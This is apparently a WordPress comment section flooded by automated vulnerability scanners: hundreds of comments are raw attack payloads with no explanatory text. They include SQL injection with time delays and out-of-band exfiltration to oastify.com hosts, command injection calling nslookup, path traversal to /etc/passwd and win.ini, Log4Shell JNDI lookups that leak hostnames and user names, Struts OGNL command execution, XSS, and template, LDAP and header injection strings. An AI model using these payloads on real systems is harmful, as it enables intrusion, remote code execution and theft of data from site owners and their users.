3,577 Comments


  1. <<<<<<<<<>>>>


  2. wp-comments-post.php


  3. bjrmwo


  4. “>


  5. hetjjs


  6. drhink


  7. “> alert(201);


  8. &(nslookup hityyrrusvvxqb0d09.bxss.me||perl -e “gethostbyname(‘hityyrrusvvxqb0d09.bxss.me’)”)&’\”`0&(nslookup hityyrrusvvxqb0d09.bxss.me||perl -e “gethostbyname(‘hityyrrusvvxqb0d09.bxss.me’)”)&`’


  9. “.gethostbyname(lc(“hitka”.”weqtyear28efc.bxss.me.”)).”A”.chr(67).chr(hex(“58″)).chr(119).chr(74).chr(115).chr(82).”


  10. 0’XOR(if(now()=sysdate(),sleep(15),0))XOR’Z


  11. Hi there!


  12. 2K8qtFNUcSFhxVvM6OXvPUqUuaT


  13. 2L2BAOfnwa2Uo1xbzoefm8IfQwg


  14. 2L5xLydmn4JEJ86s5yrrENaKRO0


  15. 2LFF2xh9ky6RqMrR6FvLfYNdaeC


  16. 2Lgz8IJr3SYnl3O3x1F707ZozBq


  17. 2LjSVKzHJBQtbe9z9aFKYmfQxdA


  18. alert(203)


  19. ../../../../../../../etc


  20. ../../../../../../../../etc/passwdindex.html


  21. ADw-script AD4-alert(202) ADw-/script AD4-


  22. ../../../../../../../../etc


  23. /etc


  24. Li4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAo=


  25. /etc/passwd


  26. ../../../../../../../../etc/passwd


  27. ../../../../../../../etc/passwd


  28. `/etc/passwd`


  29. 1(#context[“xwork.MethodAccessor.denyMethodExecution”]= new java.lang.Boolean(false), #_memberAccess[“allowStaticMethodAccess”]= new java.lang.Boolean(true), @java.lang.Thread@sleep(28*1000))


  30. ../../../../../../../../etc/passwd.html


  31. 2PhwWIhL1gO1Z794FQvQUDTINCv


  32. q
    Content-Type:text/html
    Content-Length: 190

    HTTP/1.1 200 OK
    Content-Type: text/html
    Set-Cookie: a=q
    Content-Length: 2

    AA


  33. ${${k8s:k5:-J}${k8s:k5:-ND}i${sd:k5:-:}l${lower:D}ap${sd:k5:-:}//9af7fca2de302740572275936c4e4897739ed7bc.14706605443848574.1474183457.log4j08.log4j.us3.qualysperiscope.com./QualysWAS}


  34. 2QUa3HC36gDw7jJNOsStyjnh0DP


  35. 2RcmwUVB3ENVOn0YERqjigLpULt


  36. 1(SELECT 0 FROM (SELECT SLEEP(29))qsqli_3333) /*’XOR (SELECT 0 FROM (SELECT SLEEP(29))qsqli_3333); — OR’|”XOR (SELECT 0 FROM (SELECT SLEEP(29))qsqli_3333); — OR”*/


  37. 2S4b5NrzKyF16FBucf6qRE3W6Ec


  38. 2SOtLCQf5YsB0yFC2RBAurCgT6e


  39. 2T2eOmMwTeJEhWHCSo52oKoTv6J


  40. 2TV8NwOynrmhvnHPtwjYhtql84l


  41. 2UAOw0aKM3ynDZHxhQeRjQnVmKQ


  42. 2UIxVvj0nCJxaZUflSzuJzYxqXC


  43. <script src=http://localhost/j


  44. 2UYNmo6Kj6cK2ddNc7p3HKYOnRG


  45. 2UzR8lQjvFLtRVlbPZUHIommDDg


  46. 2Wgm2LU6Ax3yGqMx82MZVSpoElC


  47. q
    Qualys_resp_hdr_injection: Vulnerable


  48. ‘;(function(){qxss6j33izva});/**/’


  49. 2XakeK9ZpXYgAOGpGpDfUW4Fn6R


  50. 2YRWccNRcaeOav79r0d7Lf3U8vN


  51. 2ZXxdhWVjnYioQ7OetGmnYG5yHA


  52. 2adQbaLdRchuIdEjt0NQFB67lPi


  53. 2asp0WTjPnF0r8nSQtD6S3WCG2d


  54. 2bAfWYZkFNFbgye8bYNATdSL9QI


  55. 2cOxJ7iun0ujGFXpi0WrvefQjN7


  56. “;(function(){qxssnViIPyOQ});/**/”


  57. %{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context[‘com.opensymphony.xwork2.ActionContext.container’]).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#str1=’A2B8C3′).(#str2=’q2d1hi3j’).(#str3=’B4D7e6′).(#str=#str2+’:QQ:’+#str1+’:PP:’+#str3).(#cmd=’echo ‘+ #str).(#iswin=(@java.lang.System@getProperty(‘os.name’).toLowerCase().contains(‘win’))).(#cmds=(#iswin?{‘cmd.exe’,’/c’,#cmd}:{‘/bin/bash’,’-c’,#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(@org.apache.commons.io.IOUtils@toString(#process.getInputStream()))}


  58. 2iJwQs1JGejganszd8CRLNqmYeH


  59. 2hwK81rrm7SwZMtWw7yZZ3CpbRw


  60. 2iM7QSveKM6T0aFAFH4Ad4F3NL5


  61. QualysWAS${“150898”.toString().replace(“8”, “7”)}QualysWAS


  62. ‘;(function(){qxss1e09V4KI});/**/’


  63. */;(function(){qxssJiUCwO74});/*


  64. (select extractvalue(xmltype(‘<!DOCTYPE root [ %ugyve;]>’),’/l’) from dual)


  65. SUGRYQ’||(select extractvalue(xmltype(‘<!DOCTYPE root [ %ugyve;]>’),’/l’) from dual)||’


  66. SUGRYQ;declare @q varchar(99);set @q=’\\68cknylwb16domusqy18708ljcp5dv1mrajx9ly.oasti’+’fy.com\dgg’; exec master.dbo.xp_dirtree @q;–


  67. SUGRYQ’;declare @q varchar(99);set @q=’\\osk27g5evjqv84eaaglqris33u9nxdl4cs4fu3j.oasti’+’fy.com\wny’; exec master.dbo.xp_dirtree @q;–


  68. SUGRYQ);declare @q varchar(99);set @q=’\\p3t3ihgf6k1wj5pblhwr2j34evko8ew5otgg64v.oasti’+’fy.com\jrg’; exec master.dbo.xp_dirtree @q;–


  69. SUGRYQ’);declare @q varchar(99);set @q=’\\ecusr6p4f9alsuy0u65gb8ctnktdh35uyiq5gt5.oasti’+’fy.com\cha’; exec master.dbo.xp_dirtree @q;–


  70. (select load_file(‘\\\\mwm0be9czhutc2i8eepovgw17sdl1bp2rqjd91y.oastify.com\\obe’))


  71. SUGRYQ’+(select load_file(‘\\\\cwcqb492z7ujcsiye4pev6wr7idb11pssgk3arz.oastify.com\\zsl’))+’


  72. SUGRYQ'(select*from(select(sleep(20)))a)’


  73. SUGRYQ+(select*from(select(sleep(20)))a)+


  74. SUGRYQ’+(select*from(select(sleep(20)))a)+’


  75. SUGRYQ and (select*from(select(sleep(20)))a)–


  76. SUGRYQ’ and (select*from(select(sleep(20)))a)–


  77. SUGRYQ,(select*from(select(sleep(20)))a)


  78. SUGRYQ’ waitfor delay’0:0:20′–


  79. SUGRYQ’)waitfor delay’0:0:20′–


  80. SUGRYQ,0)waitfor delay’0:0:20′–


  81. SUGRYQ’,0)waitfor delay’0:0:20′–


  82. SUGRYQ84110990′ or ‘7997’=’7997


  83. SUGRYQ28077701′ or ‘7637’=’7646


  84. SUGRYQ17385880′ or ‘1830’=’1830


  85. (select extractvalue(xmltype(‘<!DOCTYPE root [ %ypsbn;]>’),’/l’) from dual)


  86. SUGRYQ16194558′ or ‘4903’=’4903′


  87. ‘||(select extractvalue(xmltype(‘<!DOCTYPE root [ %ypsbn;]>’),’/l’) from dual)||’


  88. ;declare @q varchar(99);set @q=’\\bwbpb391z6uicrixe3pdv5wq7hda17pyfm79xxm.oasti’+’fy.com\vle’; exec master.dbo.xp_dirtree @q;–


  89. ‘;declare @q varchar(99);set @q=’\\jsfx7b59veqq8ze5abllrdsy3p9ixfl6cu4hu5j.oasti’+’fy.com\xai’; exec master.dbo.xp_dirtree @q;–


  90. );declare @q varchar(99);set @q=’\\2figuussixd9vi1oxu84ewfhq8w1ky8p0ds0io7.oasti’+’fy.com\gvq’; exec master.dbo.xp_dirtree @q;–


  91. ‘);declare @q varchar(99);set @q=’\\4lqi0wyuozjb1k7q3we6kyljwa23q0er7fz2pqe.oasti’+’fy.com\uwt’; exec master.dbo.xp_dirtree @q;–


  92. (select load_file(‘\\\\8bkmq0oye39froxut04aa2bnmes7g44v6jy6oud.oastify.com\\sqp’))


  93. ‘+(select load_file(‘\\\\zehdtrrphuc6uf0lwr71dteep5vyjv7maa2xslh.oastify.com\\suw’))+’


  94. ‘(select*from(select(sleep(20)))a)’


  95. ‘+(select*from(select(sleep(20)))a)+’


  96. ‘ and (select*from(select(sleep(20)))a)–


  97. ,(select*from(select(sleep(20)))a)


  98. ‘ waitfor delay’0:0:20’–


  99. ‘)waitfor delay’0:0:20’–


  100. ‘,0)waitfor delay’0:0:20’–


  101. ‘||pg_sleep(20)–


  102. ‘ AND pg_sleep(20)–


  103. ‘,”||pg_sleep(20)–


  104. ‘)AND pg_sleep(20)–


  105. ‘,0)AND pg_sleep(20)–


  106. 96031430′ or ‘1227’=’1227


  107. 47670585′ or ‘1821’=’1822


  108. 11309869′ or ‘4360’=’4360


  109. 88310481′ or ‘2317’=’2317′


  110. 82024227′ or 2613=2613–


  111. 10428732′ or 9562=9567–


  112. SUGRYQcgpkd%3cscript%3ealert%281%29%3c%2fscript%3eukhg6


  113. 85485123′ or 3153=3153–


  114. 58535973′ or 9024=9024′–


  115. SUGRYQyuz8c%3cScRiPt%3ealert%281%29%3c%2fScRiPt%3ezfqor


  116. ‘ and ‘7818’=’7818


  117. ‘ and ‘5984’=’5992


  118. ‘ and ‘6739’=’6739


  119. ‘ and ‘2438’=’2438′


  120. ‘ and 7458=7458–


  121. ‘ and 1142=1148–


  122. ‘ and 8268=8268–


  123. ‘ and 8031=8031’–


  124. 9guur79kw0


  125. alert(1)


  126. ol4y5alert(1)dcp4b


  127. ol4y5%3cscript%3ealert%281%29%3c%2fscript%3edcp4b


  128. d1wokalert(1)y2sm8


  129. d1wok%3cScRiPt%3ealert%281%29%3c%2fScRiPt%3ey2sm8


  130. SUGRYQ’+eval(compile(‘for x in range(1):\n import time\n time.sleep(20)’,’a’,’single’))+’


  131. eval(compile(‘for x in range(1):\n import time\n time.sleep(20)’,’a’,’single’))


  132. yd72v%3ca%20b%3dc%3eesf75


  133. f7pgg${525*357}awmf1


  134. fbfdu{{477*300}}aoslg


  135. trnk8#{859*552}pgnjz


  136. wunas[[322*658]]hp8jt


  137. k3vc0${file.separator}uk7ej


  138. kbz54%{710*959}y638v


  139. d03b0{{683|add:926}}t8acl


  140. #set ($a=350*763) ee7z8${a}wcn7o


  141. ej0ufsv4wr


  142. lp4g6
    = 197*393


  143. xqrb5p3ntso46dcj8pjzprqc137wvmje76uwil.oastify.com


  144. xqiav{{.}}te4ww{{..}}mehi8


  145. gf4qk__${341*811}__uo1ck


  146. }}ibs0j’/”<iehny


  147. nslookup -q=cname hk5vz9x7ncio0x6329djjbkwvn1gp6dzgn8ayyn.oastify.com.&


  148. %}oglop’/”<xm4fb


  149. SUGRYQ|nslookup -q=cname 8y7md0by13wfeokug0rax2yn9ef73xrtfl2bq0.oastify.com.&


  150. f8ogq%>q220o’/”<rrh8k


  151. SUGRYQ'”`0&nslookup -q=cname d4irj5h3782kktqzm5xf374sfjlc92xzlr8hw6.oastify.com.&`’


  152. ‘+sleep(20.to_i)+’


  153. SUGRYQ&nslookup -q=cname f1htg7e54azmhvn1j7uh091uclie64uzir5ht6.oastify.com.&’\”`0&nslookup -q=cname f1htg7e54azmhvn1j7uh091uclie64uzir5ht6.oastify.com.&`’


  154. ‘+eval(compile(‘for x in range(1):\n import time\n time.sleep(20)’,’a’,’single’))+’


  155. eval(compile(‘for x in range(1):\n import time\n time.sleep(20)’,’a’,’single’))


  156. ‘.sleep(20).’


  157. SUGRYQ|echo qqdny3f6br n5bzmr29qb||a #’ |echo qqdny3f6br n5bzmr29qb||a #|” |echo qqdny3f6br n5bzmr29qb||a #


  158. {${sleep(20)}}


  159. SUGRYQ”|echo 76eg68xax6 izokana2g1 ||


  160. 85yhu9i4rn87gy320llo


  161. SUGRYQ’|echo x6x8n2a32b xpcw1i6a13 #xzwx


  162. SUGRYQ|ping -n 21 127.0.0.1||`ping -c 21 127.0.0.1` #’ |ping -n 21 127.0.0.1||`ping -c 21 127.0.0.1` #\” |ping -n 21 127.0.0.1


  163. 81em2on9w4%41fg8fy4g8iw


  164. liwrrtt3eh\\l7tagguti2


  165. ..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\windows\win.ini


  166. ../../../../../../../../../../../../../../../../windows/win.ini


  167. l6h6nngk4sApwqgx1gmw5


  168. ..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\winnt\win.ini


  169. ../../../../../../../../../../../../../../../../winnt/win.ini


  170. …\.\…\.\…\.\…\.\…\.\…\.\…\.\…\.\…\.\…\.\windows\win.ini


  171. zord3r1prum64fal6rh1ntoez55ytvhn5fs5gu.oastify.com


  172. …/.\…/.\…/.\…/.\…/.\…/.\…/.\…/.\…/.\…/.\windows/win.ini


  173. …\./…\./…\./…\./…\./…\./…\./…\./…\./…\./windows/win.ini


  174. %2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwindows%5cwin.ini


  175. SUGRYQ..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\windows\win.ini


  176. SUGRYQ../../../../../../../../../../../../../../../../windows/win.ini


  177. SUGRYQ..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\winnt\win.ini


  178. nslookup -q=cname gtdu8866wbrn9wf2b8misatv4mafycm5pthg74w.oastify.com.&


  179. SUGRYQ../../../../../../../../../../../../../../../../winnt/win.ini


  180. ..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\windows\win.iniSUGRYQ


  181. |nslookup -q=cname 01zegseq4vz7hgnmjsu20u1fc6iz6wusik5atz.oastify.com.&


  182. ..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\winnt\win.iniSUGRYQ


  183. ../../../../../../../../../../../../../../../../etc/passwd


  184. ‘”`0&nslookup -q=cname tif7xlvjlog0y94f0lbvhni8tzzsnpbmzem4at.oastify.com.&`’


  185. …/./…/./…/./…/./…/./…/./…/./…/./…/./…/./etc/passwd


  186. &nslookup -q=cname rsn57j5hvmqy87edajltrls63x9qxnli9aw0kp.oastify.com.&’\”`0&nslookup -q=cname rsn57j5hvmqy87edajltrls63x9qxnli9aw0kp.oastify.com.&`’


  187. %2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd


  188. SUGRYQ../../../../../../../../../../../../../../../../etc/passwd


  189. ../../../../../../../../../../../../../../../../etc/passwdSUGRYQ


  190. |echo zh6pozjzd4 irnr1y3xnq||a #’ |echo zh6pozjzd4 irnr1y3xnq||a #|” |echo zh6pozjzd4 irnr1y3xnq||a #


  191. &echo dj4nzwyn3a 955voiabk9&


  192. “|echo rbn9auieke n03orgfnoa ||


  193. ‘|echo awyjq40ulr b56jzdtiou #xzwx


  194. |ping -n 21 127.0.0.1||`ping -c 21 127.0.0.1` #’ |ping -n 21 127.0.0.1||`ping -c 21 127.0.0.1` #\” |ping -n 21 127.0.0.1


  195. |ping -c 21 127.0.0.1||x


  196. &ping -n 21 127.0.0.1&


  197. ‘|ping -c 21 127.0.0.1 #


  198. “|ping -n 21 127.0.0.1 ||


  199. ..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\windows\win.ini


  200. c:\windows\win.ini


  201. ../../../../../../../../../../../../../../../../windows/win.ini


  202. ..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\winnt\win.ini


  203. ../../../../../../../../../../../../../../../../winnt/win.ini


  204. \windows\win.ini


  205. file:///c:/windows/win.ini


  206. …\.\…\.\…\.\…\.\…\.\…\.\…\.\…\.\…\.\…\.\windows\win.ini


  207. …/.\…/.\…/.\…/.\…/.\…/.\…/.\…/.\…/.\…/.\windows/win.ini


  208. …\./…\./…\./…\./…\./…\./…\./…\./…\./…\./windows/win.ini


  209. windowswin.ini


  210. %2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwindows%5cwin.ini


  211. ../../../../../../../../../../../../../../../../etc/passwd


  212. SUGRYQ’+(function(){if(typeof t6qse===”undefined”){var a=new Date();do{var b=new Date();}while(b-a<20000);t6qse=1;}}())+'


  213. file:///etc/passwd


  214. …/./…/./…/./…/./…/./…/./…/./…/./…/./…/./etc/passwd


  215. etcpasswd


  216. %2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd


  217. SUGRYQ
    BCC:2org3u1srxm94iao6uh4nwohz851trhja72usih@oastify.com
    okz: m


  218. SUGRYQ>
    BCC:fi1tx7v5lagmyv4107bhh9iutlzen4bw5kx7nvc@oastify.com
    ifx: k


  219. …/


  220. ././


  221. ${jndi:ldap://q.qf9690g5fgee58529rdrac25iwoqje8.oastify.com:99999/s2test}


  222. fhf/


  223. ${jndi:ldap://h${hostName}.2svimcthssrqikiem3q3nofhv812xqm.oastify.com:99999/s2test}


  224. ./wp-comments-post.php


  225. ${jndi:ldap://u${hostName}-s2u-${env:USERNAME:-${env:USER}}.1rthlbsgrrqphjhdl2p2mnegu701xpm.oastify.com:99999/s2test}


  226. …/wp-comments-post.php


  227. …/….///…/….///…/….///…/….///…/….///…/….///etc/passwd


  228. pph/wp-comments-post.php


  229. …/…//…/…//…/…//…/…//…/…//…/…//…/…//…/…//etc/passwd


  230. ././wp-comments-post.php


  231. ../../../../../../../../../../../../../../../../etc/passwd%00.html


  232. /./wp-comments-post.php


  233. /…/wp-comments-post.php


  234. /gmc/wp-comments-post.php


  235. /././wp-comments-post.php


  236. sh79yqjzgn)(objectClass=*


  237. ../../../../../../../../../../../../../../../../windows/win.ini%00.html


  238. 5mg4iheg74)(!(objectClass=*)


  239. dygy0jheov)(!(!(objectClass=*))


  240. sbdz52of3s)(!(!(!(objectClass=*)))


  241. *)(objectClass=*


  242. *)(!(objectClass=*)


  243. *)(!(!(objectClass=*))


  244. *)(!(!(!(objectClass=*)))


  245. %c0%ae/%c0%ae/%c0%ae/%c0%ae/WEB-INF/web.xml


  246. ]]>><


  247. ‘+(function(){if(typeof cq2f1===”undefined”){var a=new Date();do{var b=new Date();}while(b-a<20000);cq2f1=1;}}())+'


  248. fetch(‘https://d9ninkx0ujzl1ghbww0jglmgz75xtm.oastify.com’)


  249. “–>’–>`–>


  250. BCC:hh2vw9u7kcfoxx33z9ajgbhwsnygmda53tvgl4a@oastify.com
    suw: v


  251. >
    BCC:2org3u1srxm94iao6uh4nwohz851tyhqbe31tpi@oastify.com
    ayg: x


  252. O:3:”PDO”:0:{}


  253. TzozOiJQRE8iOjA6e30=


  254. %E5%98%8A%E5%98%8DX-Injection:%20test


  255. ${jndi:ldap://q.vqpbk5raqlpjgdg7kwowlhdat1zvxjm.oastify.com:99999/s2test}


  256. ${jndi:ldap://h${hostName}.a5gqzk6p504yvsvmzb3b0wsp8geady2.oastify.com:99999/s2test}


  257. ${jndi:ldap://u${hostName}-s2u-${env:USERNAME:-${env:USER}}.c4hsym5r4230uuuoyd2dzyrr7idcd02.oastify.com:99999/s2test}


  258. …/….///…/….///…/….///…/….///…/….///…/….///etc/passwd


  259. …/…//…/…//…/…//…/…//…/…//…/…//…/…//…/…//etc/passwd


  260. ../../../../../../../../../../../../../../../../etc/passwd%00.html


  261. SUGRYQ LOAD CSV FROM ‘https://1AdFYSkE.mlby6bydas8i7m9m3zgdkvpaq1wrkg.oastify.com’ as yl


  262. SUGRYQ’ LOAD CSV FROM ‘https://3scCr13R.mlby6bydas8i7m9m3zgdkvpaq1wrkg.oastify.com’ as yl//


  263. SUGRYQ})LOAD CSV FROM ‘https://yL1dscCF.mlby6bydas8i7m9m3zgdkvpaq1wrkg.oastify.com’ as yl


  264. file://\/\/etc/passwd


  265. SUGRYQ’ LOAD CSV FROM ‘https://huw8OyiL.mlby6bydas8i7m9m3zgdkvpaq1wrkg.oastify.com’ as yl MATCH(:Z) WHERE ‘3’=’3


  266. %2fetc%2fpasswd


  267. SUGRYQ’})LOAD CSV FROM ‘https://MbqkH5kO.mlby6bydas8i7m9m3zgdkvpaq1wrkg.oastify.com’ as yl//


  268. SUGRYQ” LOAD CSV FROM ‘https://WN2dJKCc.mlby6bydas8i7m9m3zgdkvpaq1wrkg.oastify.com’ as yl//


  269. ../../../../../../../../../../../../../../../../windows/win.ini%00.html


  270. SUGRYQ”})LOAD CSV FROM ‘https://bDANe8m0.mlby6bydas8i7m9m3zgdkvpaq1wrkg.oastify.com’ as yl//


  271. {!xmlparser v=’‘}


  272. SUGRYQ” LOAD CSV FROM ‘https://3BqzWGQz.mlby6bydas8i7m9m3zgdkvpaq1wrkg.oastify.com’ as yl MATCH(:Z) WHERE “3”=”3


  273. ../../../../WEB-INF/web.xml


  274. SUGRYQ”})LOAD CSV FROM ‘https://myQJHB38.mlby6bydas8i7m9m3zgdkvpaq1wrkg.oastify.com’ as yl MATCH(:Z{w:”3


  275. ../../../WEB-INF/web.xml


  276. SUGRYQ})LOAD CSV FROM ‘https://rZ829tyJ.mlby6bydas8i7m9m3zgdkvpaq1wrkg.oastify.com’ as yl//


  277. ../../WEB-INF/web.xml


  278. SUGRYQ’})LOAD CSV FROM ‘https://KxIUAlCm.mlby6bydas8i7m9m3zgdkvpaq1wrkg.oastify.com’ as yl MATCH(:Z{w:’3


  279. ../WEB-INF/web.xml


  280. SUGRYQ LOAD CSV FROM ‘https://agcVNlwI.mlby6bydas8i7m9m3zgdkvpaq1wrkg.oastify.com’ as yl//


  281. %c0%ae/WEB-INF/web.xml


  282. SUGRYQ$zq=%3c%61%60%27%22%24%7b%7b%5c&zq%3d


  283. %c0%ae/%c0%ae/WEB-INF/web.xml


  284. SUGRYQ%26zq=x%3c%61%60%27%22%24%7b%7b%5c


  285. %c0%ae/%c0%ae/%c0%ae/WEB-INF/web.xml


  286. SUGRYQ|zqy=x%3c%61%60%27%22%24%7b%7b%5c


  287. %c0%ae/%c0%ae/%c0%ae/%c0%ae/WEB-INF/web.xml


  288. ../../../WEB-INF/web.xml;x=


  289. ../../WEB-INF/web.xml;x=


  290. ../WEB-INF/web.xml;x=


  291. WEB-INF/web.xml


  292. .//WEB-INF/web.xml


  293. fetch(‘https://mtjcqi0bxn82lws5dszod2k3lurkf9.oastify.com’)


  294. %E5%98%8A%E5%98%8DX-Injection:%20test


  295. “})LOAD CSV FROM ‘https://uALeq3aZ.mlby6bydas8i7m9m3zgdkvpaq1wrkg.oastify.com’ as yl MATCH(:Z{w:”3


  296. })LOAD CSV FROM ‘https://BHceM2by.mlby6bydas8i7m9m3zgdkvpaq1wrkg.oastify.com’ as yl//


  297. LOAD CSV FROM ‘https://hXuCfJSS.mlby6bydas8i7m9m3zgdkvpaq1wrkg.oastify.com’ as yl


  298. “})LOAD CSV FROM ‘https://5LC7qmKs.mlby6bydas8i7m9m3zgdkvpaq1wrkg.oastify.com’ as yl//


  299. ‘ LOAD CSV FROM ‘https://CNuwiBPx.mlby6bydas8i7m9m3zgdkvpaq1wrkg.oastify.com’ as yl//


  300. ‘})LOAD CSV FROM ‘https://Q1mP2vYj.mlby6bydas8i7m9m3zgdkvpaq1wrkg.oastify.com’ as yl MATCH(:Z{w:’3


  301. ” LOAD CSV FROM ‘https://kn9v2flw.mlby6bydas8i7m9m3zgdkvpaq1wrkg.oastify.com’ as yl//


  302. LOAD CSV FROM ‘https://E8NPBy9q.mlby6bydas8i7m9m3zgdkvpaq1wrkg.oastify.com’ as yl//


  303. })LOAD CSV FROM ‘https://nJ6QIJvn.mlby6bydas8i7m9m3zgdkvpaq1wrkg.oastify.com’ as yl


  304. ‘ LOAD CSV FROM ‘https://xb8gL8lM.mlby6bydas8i7m9m3zgdkvpaq1wrkg.oastify.com’ as yl MATCH(:Z) WHERE ‘3’=’3


  305. ” LOAD CSV FROM ‘https://agF7TXv4.mlby6bydas8i7m9m3zgdkvpaq1wrkg.oastify.com’ as yl MATCH(:Z) WHERE “3”=”3


  306. ‘})LOAD CSV FROM ‘https://O7TNo7W2.mlby6bydas8i7m9m3zgdkvpaq1wrkg.oastify.com’ as yl//


  307. $zq=%3c%61%60%27%22%24%7b%7b%5c&zq%3d


  308. %26zq=x%3c%61%60%27%22%24%7b%7b%5c


  309. |zqy=x%3c%61%60%27%22%24%7b%7b%5c


  310. j24gr97`z’z”${{%{{\


  311. t90sege7\z`z’z”${{%{{\


  312. uperwpzd4


  313. r3v5ijgh6m1yj7pdljwt2l36exkq8gw8owgj67v


  314. oum29g7exjsva4gacgnqtiu35ubnzkncf07nxbm


  315. (select extractvalue(xmltype(‘<!DOCTYPE root [ %ggbbq;]>’),’/l’) from dual)


  316. (select extractvalue(xmltype(‘<!DOCTYPE root [ %kevye;]>’),’/l’) from dual)


  317. SUGRYQ’||(select extractvalue(xmltype(‘<!DOCTYPE root [ %ggbbq;]>’),’/l’) from dual)||’


  318. ‘||(select extractvalue(xmltype(‘<!DOCTYPE root [ %kevye;]>’),’/l’) from dual)||’


  319. SUGRYQ;declare @q varchar(99);set @q=’\\ik6wzax8ndip0y642adkjckxvo1hp7dy3mv9lxa.oasti’+’fy.com\egp’; exec master.dbo.xp_dirtree @q;–


  320. ;declare @q varchar(99);set @q=’\\sa66pknidn8zq8wesk3u9ma7lyrrfo3ft3lqbe0.oasti’+’fy.com\ebw’; exec master.dbo.xp_dirtree @q;–


  321. SUGRYQ’;declare @q varchar(99);set @q=’\\darrp5n3d88kqtwzs53f97asljrcf23tuhm4cs1.oasti’+’fy.com\jtw’; exec master.dbo.xp_dirtree @q;–


  322. ‘;declare @q varchar(99);set @q=’\\4afipwnudz8bqkwqsw369yajlar3f03rufm2cq1.oasti’+’fy.com\daq’; exec master.dbo.xp_dirtree @q;–


  323. SUGRYQ);declare @q varchar(99);set @q=’\\ji5xxbv9legqyz450bblhdiytpzin8bz3nvalya.oasti’+’fy.com\adt’; exec master.dbo.xp_dirtree @q;–


  324. );declare @q varchar(99);set @q=’\\0wxebs9qzvu7cgimesp2vuwf76dz1wpnhb9yzmo.oasti’+’fy.com\ann’; exec master.dbo.xp_dirtree @q;–


  325. SUGRYQ’);declare @q varchar(99);set @q=’\\929nh1fz540gipovk1vb132odfj87yvpodg06ov.oasti’+’fy.com\tgm’; exec master.dbo.xp_dirtree @q;–


  326. ‘);declare @q varchar(99);set @q=’\\zlod0rypouj61f7l3re1ktlew52yqvem7azxple.oasti’+’fy.com\hfm’; exec master.dbo.xp_dirtree @q;–


  327. (select load_file(‘\\\\9w6nb19zz4ugcpive1pbv3wo7fd81ypprdj09oy.oastify.com\\mqo’))


  328. (select load_file(‘\\\\d6krl5j3984kmtszo5zf576shjncb9z01otbjz8.oastify.com\\ltb’))


  329. SUGRYQ’+(select load_file(‘\\\\4tyi8w6uwzrb9kfqbwm6sytj4aa3ytmkp8hv7jw.oastify.com\\ify’))+’


  330. ‘+(select load_file(‘\\\\h5nvk9i78c3olxr3n9yj4b5wgnmgady41stfj38.oastify.com\\oos’))+’


  331. 30742581′ or ‘8472’=’8472


  332. 56089034′ or ‘9525’=’9532


  333. SUGRYQ56223652′ or ‘8886’=’8886


  334. 96044833′ or 2747=2747–


  335. SUGRYQ34907284′ or ‘3261’=’3268


  336. 56158192′ or 4226=4232–


  337. ‘ and ‘2086’=’2086


  338. ‘ and ‘9203’=’9210


  339. ‘ and 8843=8843–


  340. ‘ and 7923=7928–


  341. x7tj21y2j7


  342. (select extractvalue(xmltype(‘<!DOCTYPE root [ %zplkh;]>’),’/l’) from dual)


  343. ‘||(select extractvalue(xmltype(‘<!DOCTYPE root [ %zplkh;]>’),’/l’) from dual)||’


  344. ;declare @q varchar(99);set @q=’\\0ijexsvqlvg7yg4m0sb2huift6zznwbn1btyjm8.oasti’+’fy.com\six’; exec master.dbo.xp_dirtree @q;–


  345. (select extractvalue(xmltype(‘<!DOCTYPE root [ %inarz;]>’),’/l’) from dual)


  346. ‘;declare @q varchar(99);set @q=’\\gtdu8866wbrn9wf2b8misatv4mafycm3dr5ev2k.oasti’+’fy.com\opp’; exec master.dbo.xp_dirtree @q;–


  347. SUGRYQ’||(select extractvalue(xmltype(‘<!DOCTYPE root [ %inarz;]>’),’/l’) from dual)||’


  348. );declare @q varchar(99);set @q=’\\bq5p5331t6oi6rcx83jdp5qq1h7av7jybm39txi.oasti’+’fy.com\nvx’; exec master.dbo.xp_dirtree @q;–


  349. SUGRYQ;declare @q varchar(99);set @q=’\\y65clqjo9t45meskoqz05s6dh4nxbnzep2hp7dw.oasti’+’fy.com\wos’; exec master.dbo.xp_dirtree @q;–


  350. ‘);declare @q varchar(99);set @q=’\\4sxi7w5uvzqb8keqawl6rysj3a93x0lref62wql.oasti’+’fy.com\qwr’; exec master.dbo.xp_dirtree @q;–


  351. SUGRYQ’;declare @q varchar(99);set @q=’\\uqo85m3ktpo16acg8mjwpoq9107tvjjaay2ls9h.oasti’+’fy.com\nhj’; exec master.dbo.xp_dirtree @q;–


  352. (select load_file(‘\\\\5ouj3x1vr0mc4lar6xh7nzokzb54t1hsjgb31rq.oastify.com\\fuc’))


  353. SUGRYQ);declare @q varchar(99);set @q=’\\roj53j1hrmmy47ad6jhtnlo6zx5qtgh79v1ir6g.oasti’+’fy.com\wnk’; exec master.dbo.xp_dirtree @q;–


  354. ‘+(select load_file(‘\\\\1gifvttrjwe8wh2nyt93fvggr7x0lx9occ4zunj.oastify.com\\rih’))+’


